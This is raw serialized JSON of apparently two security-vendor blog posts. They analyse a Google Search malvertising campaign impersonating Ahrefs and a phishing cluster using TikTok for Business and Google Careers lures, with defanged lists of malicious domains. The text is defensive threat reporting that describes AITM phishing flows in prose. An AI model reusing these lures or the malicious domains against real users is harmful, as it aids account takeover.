",[],{},{"nodeType":1335,"data":8663,"content":8667},{"target":8664},{"sys":8665},{"id":8666,"type":1340,"linkType":1341},"59dhFey5rahm5sA20NudTl",[],{"nodeType":1258,"data":8669,"content":8670},{},[8671],{"nodeType":1257,"value":8672,"marks":8673,"data":8674},"Upon clicking the link, the victim was taken to a clone of the real Ahrefs site. Crucially, you can see that the domain is not the official Ahrefs domain. ",[],{},{"nodeType":1335,"data":8676,"content":8680},{"target":8677},{"sys":8678},{"id":8679,"type":1340,"linkType":1341},"48fQUiJXC1qACKUUPDliS5",[],{"nodeType":1335,"data":8682,"content":8686},{"target":8683},{"sys":8684},{"id":8685,"type":1340,"linkType":1341},"77iqOW1jDVt5Oxw8qTwnKG",[],{"nodeType":1258,"data":8688,"content":8689},{},[8690],{"nodeType":1257,"value":8691,"marks":8692,"data":8693},"However, the site is not fully interactable beyond the front page. Clicking on any link takes the user to a Google sign-in page. 
",[],{},{"nodeType":1335,"data":8695,"content":8699},{"target":8696},{"sys":8697},{"id":8698,"type":1340,"linkType":1341},"7t9BoUyIFN8dlBDksjsYlD",[],{"nodeType":1258,"data":8701,"content":8702},{},[8703,8707,8714],{"nodeType":1257,"value":8704,"marks":8705,"data":8706},"This is in fact an AITM phishing page that is designed to hijack the victim’s Google account. Entering credentials and completing the MFA check will result in the attacker stealing the app session and effectively taking over the account. The phishing kit used matches ",[],{},{"nodeType":1364,"data":8708,"content":8709},{"uri":8572},[8710],{"nodeType":1257,"value":8711,"marks":8712,"data":8713},"the previous malvertising detected impersonating Google Ads",[],{},{"nodeType":1257,"value":6166,"marks":8715,"data":8716},[],{},{"nodeType":1307,"data":8718,"content":8719},{},[],{"nodeType":1311,"data":8721,"content":8722},{},[8723],{"nodeType":1257,"value":8724,"marks":8725,"data":8727},"Why are attackers targeting ad manager accounts?",[8726],{"type":1318},{},{"nodeType":1258,"data":8729,"content":8730},{},[8731],{"nodeType":1257,"value":8732,"marks":8733,"data":8734},"Ad Manager accounts on platforms like Google, Facebook, and LinkedIn have become lucrative targets for cybercriminals. By compromising these accounts, attackers can exploit the digital advertising ecosystem in various ways for financial gain. ",[],{},{"nodeType":1258,"data":8736,"content":8737},{},[8738],{"nodeType":1257,"value":8739,"marks":8740,"data":8741},"The ad industry’s scale makes it attractive to fraud. Estimates suggest digital ad fraud cost advertisers tens of billions, potentially nearing $100 billion or more, with projections reaching $172 billion by 2028.",[],{},{"nodeType":1258,"data":8743,"content":8744},{},[8745],{"nodeType":1257,"value":8746,"marks":8747,"data":8748},"A hijacked Google Ad Manager account gives attackers access to significant ad spend and account data which can be monetized illicitly. 
The tactics range from stealthy ad fraud to overt abuse like malicious ads or extortion schemes.",[],{},{"nodeType":1258,"data":8750,"content":8751},{},[8752],{"nodeType":1257,"value":8753,"marks":8754,"data":8755},"Pretty much every enterprise today advertises their services via Google Ads — this makes attacks on these accounts a near-universal problem. Agencies managing numerous client accounts are put further at risk. For example, if an attacker can compromise an MCC account (used to manage several ad accounts) they get full access to the customer portfolio. ",[],{},{"nodeType":1335,"data":8757,"content":8761},{"target":8758},{"sys":8759},{"id":8760,"type":1340,"linkType":1341},"1WPbstxHtdjnAKpF1rhCpW",[],{"nodeType":1258,"data":8763,"content":8764},{},[8765,8769,8777],{"nodeType":1257,"value":8766,"marks":8767,"data":8768},"Learn more about why attackers are targeting ad manager accounts ",[],{},{"nodeType":1364,"data":8770,"content":8772},{"uri":8771},"https://pushsecurity.com/blog/cyber-criminal-ecosystem-analysis",[8773],{"nodeType":1257,"value":8774,"marks":8775,"data":8776},"in our blog post",[],{},{"nodeType":1257,"value":6166,"marks":8778,"data":8779},[],{},{"nodeType":1307,"data":8781,"content":8782},{},[],{"nodeType":1311,"data":8784,"content":8785},{},[8786],{"nodeType":1257,"value":8787,"marks":8788,"data":8790},"Why malvertising? ",[8789],{"type":1318},{},{"nodeType":1258,"data":8792,"content":8793},{},[8794],{"nodeType":1257,"value":8795,"marks":8796,"data":8797},"Malvertising scams happen across lots of different sites, but the most common platform we see targeted is Google Search. This takes advantage of users browsing to find a website and clicking the first link that appears — in this case a fake sponsored link taking you to the attacker’s page. 
",[],{},{"nodeType":1258,"data":8799,"content":8800},{},[8801,8805,8813,8817,8826,8829,8838,8841,8850],{"nodeType":1257,"value":8802,"marks":8803,"data":8804},"Malvertising attacks delivered over channels like Google Search are a great way to catch victims unawares while also evading typically email-based anti-phishing controls. Malvertising is an increasingly popular attack vector for the delivery of AITM phishing, malware downloads, and ",[],{},{"nodeType":1364,"data":8806,"content":8807},{"uri":2543},[8808],{"nodeType":1257,"value":8809,"marks":8810,"data":8812},"ClickFix",[8811],{"type":1372},{},{"nodeType":1257,"value":8814,"marks":8815,"data":8816}," (4 in 5 ClickFix attacks intercepted by Push were delivered via Google Search). This isn’t just targeting ad manager accounts — last year, we reported on campaigns impersonating ",[],{},{"nodeType":1364,"data":8818,"content":8820},{"uri":8819},"https://pushsecurity.com/blog/analysing-a-sophisticated-google-malvertising-attack/",[8821],{"nodeType":1257,"value":8822,"marks":8823,"data":8825},"TradingView",[8824],{"type":1372},{},{"nodeType":1257,"value":3548,"marks":8827,"data":8828},[],{},{"nodeType":1364,"data":8830,"content":8832},{"uri":8831},"https://pushsecurity.com/blog/phishing-with-active-directory-federation-services/",[8833],{"nodeType":1257,"value":8834,"marks":8835,"data":8837},"Microsoft Office 365",[8836],{"type":1372},{},{"nodeType":1257,"value":4072,"marks":8839,"data":8840},[],{},{"nodeType":1364,"data":8842,"content":8844},{"uri":8843},"https://pushsecurity.com/blog/investigating-a-recent-malvertising-campaign-targeting-onfido-customers/",[8845],{"nodeType":1257,"value":8846,"marks":8847,"data":8849},"Onfido",[8848],{"type":1372},{},{"nodeType":1257,"value":8851,"marks":8852,"data":8853},", to name a few. 
",[],{},{"nodeType":1258,"data":8855,"content":8856},{},[8857],{"nodeType":1257,"value":8858,"marks":8859,"data":8860},"There’s a tendency to see malvertising as a more random attack, but Google Ads can be tuned to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). If you know where your target organization is located, you can tailor the ad to that location. Even more precise ad targeting can be achieved on social media platforms. ",[],{},{"nodeType":1258,"data":8862,"content":8863},{},[8864],{"nodeType":1257,"value":8865,"marks":8866,"data":8867},"Because these attacks completely circumvent the traditional phishing detection surface (email) and often happen entirely over the internet (meaning no endpoint security controls can come into play) the only way to reliably detect and stop these attacks is to intercept them where they happen — in the user’s web browser. ",[],{},{"nodeType":1307,"data":8869,"content":8870},{},[],{"nodeType":1311,"data":8872,"content":8873},{},[8874],{"nodeType":1257,"value":3044,"marks":8875,"data":8877},[8876],{"type":1318},{},{"nodeType":1258,"data":8879,"content":8880},{},[8881],{"nodeType":1257,"value":8882,"marks":8883,"data":8884},"Regardless of the delivery channel, all roads lead to a web page accessed in the victim’s browser, where Push is waiting to detect and block the attack. Even if the page has never been previously flagged as suspicious or malicious, Push analyses the page in real time and blocks it — protecting against the latest zero-day threats.  ",[],{},{"nodeType":1258,"data":8886,"content":8887},{},[8888],{"nodeType":1257,"value":8889,"marks":8890,"data":8891},"By seeing what your users see, and getting an unfiltered, real-time view of the page as it loads, Push is able to pinpoint malicious content, code, and behaviors and shut the attack down before it happens. 
Whether it's entering credentials onto a phishing page, approving a malicious OAuth grant, installing a risky browser extension, or insecurely accessing an app with a weak password and no MFA, Push detects the action and shuts it down.",[],{},{"nodeType":1258,"data":8893,"content":8894},{},[8895],{"nodeType":1257,"value":8896,"marks":8897,"data":8898},"Push blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, malicious OAuth grants, ClickFix, and session hijacking. You don’t need to wait until it all goes wrong either — you can use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your identity attack surface.",[],{},{"nodeType":1258,"data":8900,"content":8901},{},[8902,8905,8912,8915,8922],{"nodeType":1257,"value":2223,"marks":8903,"data":8904},[],{},{"nodeType":1364,"data":8906,"content":8907},{"uri":2228},[8908],{"nodeType":1257,"value":2231,"marks":8909,"data":8911},[8910],{"type":1372},{},{"nodeType":1257,"value":2236,"marks":8913,"data":8914},[],{},{"nodeType":1364,"data":8916,"content":8917},{"uri":2241},[8918],{"nodeType":1257,"value":2244,"marks":8919,"data":8921},[8920],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":8923,"data":8924},[],{},{"nodeType":1307,"data":8926,"content":8927},{},[],{"nodeType":1311,"data":8929,"content":8930},{},[8931],{"nodeType":1257,"value":2933,"marks":8932,"data":8934},[8933],{"type":1318},{},{"nodeType":1258,"data":8936,"content":8937},{},[8938,8941,8948],{"nodeType":1257,"value":2941,"marks":8939,"data":8940},[],{},{"nodeType":1364,"data":8942,"content":8943},{"uri":2946},[8944],{"nodeType":1257,"value":2949,"marks":8945,"data":8947},[8946],{"type":1372},{},{"nodeType":1257,"value":2954,"marks":8949,"data":8950},[],{},{"nodeType":1258,"data":8952,"content":8953},{},[8954],{"nodeType":1257,"value":8955,"marks":8956,"data":8957},"That said, the 
domains observed in this chain were:",[],{},{"nodeType":1884,"data":8959,"content":8960},{},[8961,8971,8981,8991],{"nodeType":1888,"data":8962,"content":8963},{},[8964],{"nodeType":1258,"data":8965,"content":8966},{},[8967],{"nodeType":1257,"value":8968,"marks":8969,"data":8970},"comandd-ok[.]com",[],{},{"nodeType":1888,"data":8972,"content":8973},{},[8974],{"nodeType":1258,"data":8975,"content":8976},{},[8977],{"nodeType":1257,"value":8978,"marks":8979,"data":8980},"ahrefs-ac.squarespace[.]com",[],{},{"nodeType":1888,"data":8982,"content":8983},{},[8984],{"nodeType":1258,"data":8985,"content":8986},{},[8987],{"nodeType":1257,"value":8988,"marks":8989,"data":8990},"ahrefs-seo-app.squarespace[.]com",[],{},{"nodeType":1888,"data":8992,"content":8993},{},[8994],{"nodeType":1258,"data":8995,"content":8996},{},[8997],{"nodeType":1257,"value":8998,"marks":8999,"data":9000},"slgn-ahrefs-app-com.squarespace[.]com",[],{},{"nodeType":1258,"data":9002,"content":9003},{},[9004],{"nodeType":1257,"value":9005,"marks":9006,"data":9007},"[Update 24th February] We also observed the following new 
domains:",[],{},{"nodeType":1884,"data":9009,"content":9010},{},[9011,9021,9031,9041],{"nodeType":1888,"data":9012,"content":9013},{},[9014],{"nodeType":1258,"data":9015,"content":9016},{},[9017],{"nodeType":1257,"value":9018,"marks":9019,"data":9020},"www-ahrefs-seo-ads[.]surge.sh",[],{},{"nodeType":1888,"data":9022,"content":9023},{},[9024],{"nodeType":1258,"data":9025,"content":9026},{},[9027],{"nodeType":1257,"value":9028,"marks":9029,"data":9030},"web-semrush-seo-wold[.]surge[.]sh",[],{},{"nodeType":1888,"data":9032,"content":9033},{},[9034],{"nodeType":1258,"data":9035,"content":9036},{},[9037],{"nodeType":1257,"value":9038,"marks":9039,"data":9040},"contabelforeehc[.]com",[],{},{"nodeType":1888,"data":9042,"content":9043},{},[9044],{"nodeType":1258,"data":9045,"content":9046},{},[9047],{"nodeType":1257,"value":9048,"marks":9049,"data":9050},"contabelfore[.]com",[],{},{"nodeType":1258,"data":9052,"content":9053},{},[9054],{"nodeType":1257,"value":9055,"marks":9056,"data":9057},"In addition, the following domains were previously associated with the attacks we detected in 
December:",[],{},{"nodeType":1884,"data":9059,"content":9060},{},[9061,9071,9081,9091,9101,9111,9121],{"nodeType":1888,"data":9062,"content":9063},{},[9064],{"nodeType":1258,"data":9065,"content":9066},{},[9067],{"nodeType":1257,"value":9068,"marks":9069,"data":9070},"ads-adsword1.odoo[.]com",[],{},{"nodeType":1888,"data":9072,"content":9073},{},[9074],{"nodeType":1258,"data":9075,"content":9076},{},[9077],{"nodeType":1257,"value":9078,"marks":9079,"data":9080},"sing-operador2[.]click/accounts/v3/login",[],{},{"nodeType":1888,"data":9082,"content":9083},{},[9084],{"nodeType":1258,"data":9085,"content":9086},{},[9087],{"nodeType":1257,"value":9088,"marks":9089,"data":9090},"adsgooglie.odoo[.]com/",[],{},{"nodeType":1888,"data":9092,"content":9093},{},[9094],{"nodeType":1258,"data":9095,"content":9096},{},[9097],{"nodeType":1257,"value":9098,"marks":9099,"data":9100},"word4only[.]online/",[],{},{"nodeType":1888,"data":9102,"content":9103},{},[9104],{"nodeType":1258,"data":9105,"content":9106},{},[9107],{"nodeType":1257,"value":9108,"marks":9109,"data":9110},"adsloginacess.kartra[.]com/page/oeN7",[],{},{"nodeType":1888,"data":9112,"content":9113},{},[9114],{"nodeType":1258,"data":9115,"content":9116},{},[9117],{"nodeType":1257,"value":9118,"marks":9119,"data":9120},"ads-o.odoo[.]com",[],{},{"nodeType":1888,"data":9122,"content":9123},{},[9124],{"nodeType":1258,"data":9125,"content":9126},{},[9127],{"nodeType":1257,"value":9128,"marks":9129,"data":9130},"operador8-ads[.]lat/accounts/v3/login/",[],{},{"nodeType":1258,"data":9132,"content":9133},{},[9134],{"nodeType":1257,"value":9135,"marks":9136,"data":9138},"Push customers do not need to take any further action.",[9137],{"type":1318},{},"Google Search malvertising campaign continues, now impersonating Ahrefs","New samples linked to a Push-tracked malvertising campaign detected, targeting Google accounts via an Ahrefs lure. 
","2026-01-12T00:00:00.000Z","google-search-malvertising-campaign-continues-now-impersonating-ahrefs",{"items":9144},[9145,9147],{"sys":9146,"name":1274},{"id":1273},{"sys":9148,"name":1270},{"id":1269},{"items":9150},[9151],{"fullName":2265,"firstName":2266,"jobTitle":2267,"profilePicture":9152},{"url":2269},{"items":9154},[9155],{"fullName":2265,"firstName":2266,"jobTitle":2267,"profilePicture":9156},{"url":2269},{"json":9158,"links":9734},{"nodeType":1259,"data":9159,"content":9160},{},[9161,9168,9188,9194,9197,9205,9212,9219,9226,9249,9256,9275,9282,9288,9296,9303,9309,9315,9321,9327,9333,9339,9345,9348,9356,9363,9370,9390,9436,9443,9485,9491,9494,9501,9517,9524,9636,9643,9656,9663,9666,9674,9680,9686,9722,9728],{"nodeType":1258,"data":9162,"content":9163},{},[9164],{"nodeType":1257,"value":9165,"marks":9166,"data":9167},"We recently detected and blocked a new style of phishing page targeting TikTok for Business accounts — used by company marketing teams to manage ad campaigns. ",[],{},{"nodeType":1258,"data":9169,"content":9170},{},[9171,9175,9184],{"nodeType":1257,"value":9172,"marks":9173,"data":9174},"On closer analysis, we identified a cluster of linked pages featuring both TikTok themes, and Google-themed “Schedule a Call” imitation pages, ",[],{},{"nodeType":1364,"data":9176,"content":9178},{"uri":9177},"https://sublime.security/blog/google-careers-impersonation-credential-phishing-scam-with-endless-variation/",[9179],{"nodeType":1257,"value":9180,"marks":9181,"data":9183},"similar to a campaign reported late last year",[9182],{"type":1372},{},{"nodeType":1257,"value":9185,"marks":9186,"data":9187},", suggesting a continuation of this previous 
campaign.",[],{},{"nodeType":1335,"data":9189,"content":9193},{"target":9190},{"sys":9191},{"id":9192,"type":1340,"linkType":1341},"6mR622LOKuhGRfBXkIsUrx",[],{"nodeType":1307,"data":9195,"content":9196},{},[],{"nodeType":1311,"data":9198,"content":9199},{},[9200],{"nodeType":1257,"value":9201,"marks":9202,"data":9204},"Campaign breakdown",[9203],{"type":1318},{},{"nodeType":1258,"data":9206,"content":9207},{},[9208],{"nodeType":1257,"value":9209,"marks":9210,"data":9211},"Push researchers have identified a cluster of newly registered phishing pages all registered on the 24th March within a 9-second window. All of the pages are hosted behind Cloudflare with the same registrar (Nicenic International Group, commonly abused for bulk phishing domain registration). ",[],{},{"nodeType":1258,"data":9213,"content":9214},{},[9215],{"nodeType":1257,"value":9216,"marks":9217,"data":9218},"The pages feature a common naming convention, being various derivations of welcome.careers*[.]com. A full list of identified domains is provided later, but we expect this to grow significantly as the campaign ramps up. ",[],{},{"nodeType":1258,"data":9220,"content":9221},{},[9222],{"nodeType":1257,"value":9223,"marks":9224,"data":9225},"Victims are tricked into clicking a malicious link that takes them to one of two page styles. 
",[],{},{"nodeType":1884,"data":9227,"content":9228},{},[9229,9239],{"nodeType":1888,"data":9230,"content":9231},{},[9232],{"nodeType":1258,"data":9233,"content":9234},{},[9235],{"nodeType":1257,"value":9236,"marks":9237,"data":9238},"A TikTok for Business cloned page ",[],{},{"nodeType":1888,"data":9240,"content":9241},{},[9242],{"nodeType":1258,"data":9243,"content":9244},{},[9245],{"nodeType":1257,"value":9246,"marks":9247,"data":9248},"A Google careers “Schedule a call” cloned page",[],{},{"nodeType":1258,"data":9250,"content":9251},{},[9252],{"nodeType":1257,"value":9253,"marks":9254,"data":9255},"In both cases, the victim is required to complete a basic information form before being served with a malicious login page that is in fact fronting a reverse proxy AITM phishing kit. ",[],{},{"nodeType":1258,"data":9257,"content":9258},{},[9259,9263,9271],{"nodeType":1257,"value":9260,"marks":9261,"data":9262},"While Push has limited visibility of the initial delivery mechanism in this case, we can assume that a similar method of dynamically generated email is being used to the ",[],{},{"nodeType":1364,"data":9264,"content":9265},{"uri":9177},[9266],{"nodeType":1257,"value":9267,"marks":9268,"data":9270},"previously identified campaign",[9269],{"type":1372},{},{"nodeType":1257,"value":9272,"marks":9273,"data":9274}," reported by Sublime in October, featuring a similar Google Careers cloned page. ",[],{},{"nodeType":1258,"data":9276,"content":9277},{},[9278],{"nodeType":1257,"value":9279,"marks":9280,"data":9281},"You can see an example of the page load below. 
",[],{},{"nodeType":1335,"data":9283,"content":9287},{"target":9284},{"sys":9285},{"id":9286,"type":1340,"linkType":1341},"3wjGpMs3qJsZaar2LIlQbE",[],{"nodeType":1468,"data":9289,"content":9290},{},[9291],{"nodeType":1257,"value":9292,"marks":9293,"data":9295},"Attack flow",[9294],{"type":1318},{},{"nodeType":1258,"data":9297,"content":9298},{},[9299],{"nodeType":1257,"value":9300,"marks":9301,"data":9302},"When the link is first clicked, the page is silently redirected from a legitimate Google Storage site before loading the page. A Cloudflare Turnstile check is used to prevent security bots from analyzing the page, before loading either a TikTok or Google themed page. Progressing through the forms ultimately serves up an AITM phishing page.",[],{},{"nodeType":1335,"data":9304,"content":9308},{"target":9305},{"sys":9306},{"id":9307,"type":1340,"linkType":1341},"5zoUeGW0zlC7u9vtHolskM",[],{"nodeType":1335,"data":9310,"content":9314},{"target":9311},{"sys":9312},{"id":9313,"type":1340,"linkType":1341},"7eyc9v7xVZzXK8jY53I9li",[],{"nodeType":1335,"data":9316,"content":9320},{"target":9317},{"sys":9318},{"id":9319,"type":1340,"linkType":1341},"37kj78jit44Mp6LCi7tEsC",[],{"nodeType":1335,"data":9322,"content":9326},{"target":9323},{"sys":9324},{"id":9325,"type":1340,"linkType":1341},"4qaPOlBYeIfEoG2OZvl8lI",[],{"nodeType":1335,"data":9328,"content":9332},{"target":9329},{"sys":9330},{"id":9331,"type":1340,"linkType":1341},"7cIFMDwHF2R8vswtJzWdKn",[],{"nodeType":1335,"data":9334,"content":9338},{"target":9335},{"sys":9336},{"id":9337,"type":1340,"linkType":1341},"5YtrhvypdLkcSUoj2IEj24",[],{"nodeType":1335,"data":9340,"content":9344},{"target":9341},{"sys":9342},{"id":9343,"type":1340,"linkType":1341},"7cc4UclvVVW3YuUVB8PpJp",[],{"nodeType":1307,"data":9346,"content":9347},{},[],{"nodeType":1311,"data":9349,"content":9350},{},[9351],{"nodeType":1257,"value":9352,"marks":9353,"data":9355},"Why 
TikTok???",[9354],{"type":1318},{},{"nodeType":1258,"data":9357,"content":9358},{},[9359],{"nodeType":1257,"value":9360,"marks":9361,"data":9362},"Given that the majority of phishing pages intercepted by Push tend to replicate core SSO platforms like Google and Microsoft, targeting TikTok is a notable development, though not entirely uncommon. ",[],{},{"nodeType":1258,"data":9364,"content":9365},{},[9366],{"nodeType":1257,"value":9367,"marks":9368,"data":9369},"TikTok seems a weird choice at first glance. But it makes more sense when we consider that TikTok has been historically abused to distribute malicious links and social engineering instructions. ",[],{},{"nodeType":1258,"data":9371,"content":9372},{},[9373,9377,9386],{"nodeType":1257,"value":9374,"marks":9375,"data":9376},"This includes multiple infostealers like Vidar, StealC, and Aura Stealer delivered via ClickFix-style instructions with AI-generated videos posed as activation guides for Windows, Spotify, and CapCut. They instructed viewers to open PowerShell and paste commands that downloaded infostealers from bulletproof hosting infrastructure. ",[],{},{"nodeType":1364,"data":9378,"content":9380},{"uri":9379},"https://thehackernews.com/2025/05/hackers-use-tiktok-videos-to-distribute.html",[9381],{"nodeType":1257,"value":9382,"marks":9383,"data":9385},"One video alone",[9384],{"type":1372},{},{"nodeType":1257,"value":9387,"marks":9388,"data":9389}," hit ~500,000 views and 20,000+ likes.",[],{},{"nodeType":1258,"data":9391,"content":9392},{},[9393,9397,9406,9410,9419,9423,9432],{"nodeType":1257,"value":9394,"marks":9395,"data":9396},"It’s also a common hunting ground for crypto scammers, like many other social platforms have historically been abused (most commonly Twitter/X). 
Many of these are done with the full knowledge and consent of “influencers”, but there are also overtly malicious examples such as ",[],{},{"nodeType":1364,"data":9398,"content":9400},{"uri":9399},"https://www.bitdefender.com/en-us/blog/hotforsecurity/fake-elon-musk-crypto-giveaway-scam-campaigns-run-rampant-on-tiktok",[9401],{"nodeType":1257,"value":9402,"marks":9403,"data":9405},"deepfaked videos of Elon Musk",[9404],{"type":1372},{},{"nodeType":1257,"value":9407,"marks":9408,"data":9409}," with overlaid AI-generated audio promoting fake exchanges. ",[],{},{"nodeType":1364,"data":9411,"content":9413},{"uri":9412},"https://www.malwarebytes.com/blog/news/2025/10/tiktok-scam-sells-you-access-to-your-own-fake-money",[9414],{"nodeType":1257,"value":9415,"marks":9416,"data":9418},"TikTok DMs",[9417],{"type":1372},{},{"nodeType":1257,"value":9420,"marks":9421,"data":9422},", like ",[],{},{"nodeType":1364,"data":9424,"content":9426},{"uri":9425},"https://pushsecurity.com/blog/new-phishing-campaign-identified-targeting-linkedin-users/",[9427],{"nodeType":1257,"value":9428,"marks":9429,"data":9431},"other social media apps",[9430],{"type":1372},{},{"nodeType":1257,"value":9433,"marks":9434,"data":9435},", are also a place where attackers can target victims. ",[],{},{"nodeType":1258,"data":9437,"content":9438},{},[9439],{"nodeType":1257,"value":9440,"marks":9441,"data":9442},"Ultimately, it’s easy to see how access to verified and trustworthy business accounts on TikTok could be abused in the wrong hands. 
",[],{},{"nodeType":1258,"data":9444,"content":9445},{},[9446,9450,9458,9462,9470,9474,9482],{"nodeType":1257,"value":9447,"marks":9448,"data":9449},"It’s worth pointing out too that many/most business users will opt to “log in with Google.” This means that anyone using Google to log in to their TikTok account will effectively have both accounts used to distribute ads compromised in one go, opening up the typical ",[],{},{"nodeType":1364,"data":9451,"content":9452},{"uri":7710},[9453],{"nodeType":1257,"value":9454,"marks":9455,"data":9457},"Google Ad Manager exploitation playbook",[9456],{"type":1372},{},{"nodeType":1257,"value":9459,"marks":9460,"data":9461}," — as well as access to any further apps accessible via SSO for data theft and extortion. This has become the standard MO for attackers, in campaigns such as the ",[],{},{"nodeType":1364,"data":9463,"content":9464},{"uri":1720},[9465],{"nodeType":1257,"value":9466,"marks":9467,"data":9469},"Scattered Lapsus$ Hunters AITM phishing",[9468],{"type":1372},{},{"nodeType":1257,"value":9471,"marks":9472,"data":9473}," spree earlier this year, and their ",[],{},{"nodeType":1364,"data":9475,"content":9476},{"uri":4064},[9477],{"nodeType":1257,"value":9478,"marks":9479,"data":9481},"recent spate of device code phishing 
attacks",[9480],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":9483,"data":9484},[],{},{"nodeType":1335,"data":9486,"content":9490},{"target":9487},{"sys":9488},{"id":9489,"type":1340,"linkType":1341},"4H3AzW7q4QBv7pJawSqQBJ",[],{"nodeType":1307,"data":9492,"content":9493},{},[],{"nodeType":1311,"data":9495,"content":9496},{},[9497],{"nodeType":1257,"value":2933,"marks":9498,"data":9500},[9499],{"type":1318},{},{"nodeType":1258,"data":9502,"content":9503},{},[9504,9507,9514],{"nodeType":1257,"value":2941,"marks":9505,"data":9506},[],{},{"nodeType":1364,"data":9508,"content":9509},{"uri":2946},[9510],{"nodeType":1257,"value":2949,"marks":9511,"data":9513},[9512],{"type":1372},{},{"nodeType":1257,"value":2954,"marks":9515,"data":9516},[],{},{"nodeType":1258,"data":9518,"content":9519},{},[9520],{"nodeType":1257,"value":9521,"marks":9522,"data":9523},"That said, the domains observed in the initial cluster were:",[],{},{"nodeType":1884,"data":9525,"content":9526},{},[9527,9537,9547,9557,9567,9577,9587,9597,9607,9617,9627],{"nodeType":1888,"data":9528,"content":9529},{},[9530],{"nodeType":1258,"data":9531,"content":9532},{},[9533],{"nodeType":1257,"value":9534,"marks":9535,"data":9536},"welcome.careerscrews[.]com",[],{},{"nodeType":1888,"data":9538,"content":9539},{},[9540],{"nodeType":1258,"data":9541,"content":9542},{},[9543],{"nodeType":1257,"value":9544,"marks":9545,"data":9546},"welcome.careerstaffer[.]com",[],{},{"nodeType":1888,"data":9548,"content":9549},{},[9550],{"nodeType":1258,"data":9551,"content":9552},{},[9553],{"nodeType":1257,"value":9554,"marks":9555,"data":9556},"welcome.careersworkflow[.]com",[],{},{"nodeType":1888,"data":9558,"content":9559},{},[9560],{"nodeType":1258,"data":9561,"content":9562},{},[9563],{"nodeType":1257,"value":9564,"marks":9565,"data":9566},"welcome.careerstransform[.]com",[],{},{"nodeType":1888,"data":9568,"content":9569},{},[9570],{"nodeType":1258,"data":9571,"content":9572},{},[9573],{"nodeType":1257,"value":9574,"marks
":9575,"data":9576},"welcome.careersupskill[.]com",[],{},{"nodeType":1888,"data":9578,"content":9579},{},[9580],{"nodeType":1258,"data":9581,"content":9582},{},[9583],{"nodeType":1257,"value":9584,"marks":9585,"data":9586},"welcome.careerssuccess[.]com",[],{},{"nodeType":1888,"data":9588,"content":9589},{},[9590],{"nodeType":1258,"data":9591,"content":9592},{},[9593],{"nodeType":1257,"value":9594,"marks":9595,"data":9596},"welcome.careersstaffgrid[.]com",[],{},{"nodeType":1888,"data":9598,"content":9599},{},[9600],{"nodeType":1258,"data":9601,"content":9602},{},[9603],{"nodeType":1257,"value":9604,"marks":9605,"data":9606},"welcome.careersprogress[.]com",[],{},{"nodeType":1888,"data":9608,"content":9609},{},[9610],{"nodeType":1258,"data":9611,"content":9612},{},[9613],{"nodeType":1257,"value":9614,"marks":9615,"data":9616},"welcome.careersgrower[.]com",[],{},{"nodeType":1888,"data":9618,"content":9619},{},[9620],{"nodeType":1258,"data":9621,"content":9622},{},[9623],{"nodeType":1257,"value":9624,"marks":9625,"data":9626},"welcome.careersengage[.]com",[],{},{"nodeType":1888,"data":9628,"content":9629},{},[9630],{"nodeType":1258,"data":9631,"content":9632},{},[9633],{"nodeType":1257,"value":9534,"marks":9634,"data":9635},[],{},{"nodeType":1258,"data":9637,"content":9638},{},[9639],{"nodeType":1257,"value":9640,"marks":9641,"data":9642},"Since the pages are all hosted in a single Google Storage bucket, any linked pages/files should be considered to be 
malicious.",[],{},{"nodeType":1884,"data":9644,"content":9645},{},[9646],{"nodeType":1888,"data":9647,"content":9648},{},[9649],{"nodeType":1258,"data":9650,"content":9651},{},[9652],{"nodeType":1257,"value":9653,"marks":9654,"data":9655},"storage.googleapis[.]com/fiz2a4s014vt8q4l5i0m1m7b0gl/",[],{},{"nodeType":1258,"data":9657,"content":9658},{},[9659],{"nodeType":1257,"value":9135,"marks":9660,"data":9662},[9661],{"type":1318},{},{"nodeType":1307,"data":9664,"content":9665},{},[],{"nodeType":1311,"data":9667,"content":9668},{},[9669],{"nodeType":1257,"value":9670,"marks":9671,"data":9673},"About Push Security",[9672],{"type":1318},{},{"nodeType":1258,"data":9675,"content":9676},{},[9677],{"nodeType":1257,"value":8007,"marks":9678,"data":9679},[],{},{"nodeType":1258,"data":9681,"content":9682},{},[9683],{"nodeType":1257,"value":6324,"marks":9684,"data":9685},[],{},{"nodeType":1258,"data":9687,"content":9688},{},[9689,9692,9699,9702,9709,9712,9719],{"nodeType":1257,"value":2223,"marks":9690,"data":9691},[],{},{"nodeType":1364,"data":9693,"content":9694},{"uri":2228},[9695],{"nodeType":1257,"value":2231,"marks":9696,"data":9698},[9697],{"type":1372},{},{"nodeType":1257,"value":3548,"marks":9700,"data":9701},[],{},{"nodeType":1364,"data":9703,"content":9704},{"uri":3737},[9705],{"nodeType":1257,"value":6347,"marks":9706,"data":9708},[9707],{"type":1372},{},{"nodeType":1257,"value":3744,"marks":9710,"data":9711},[],{},{"nodeType":1364,"data":9713,"content":9714},{"uri":2241},[9715],{"nodeType":1257,"value":2244,"marks":9716,"data":9718},[9717],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":9720,"data":9721},[],{},{"nodeType":1335,"data":9723,"content":9727},{"target":9724},{"sys":9725},{"id":9726,"type":1340,"linkType":1341},"7ccfmP2yXXmtC1R5BLmKYg",[],{"nodeType":1258,"data":9729,"content":9730},{},[9731],{"nodeType":1257,"value":31,"marks":9732,"data":9733},[],{},{"entries":9735},{"hyperlink":9736,"inline":9737,"block":9738},[],[],[9739,9778,9783,9790,9796,98
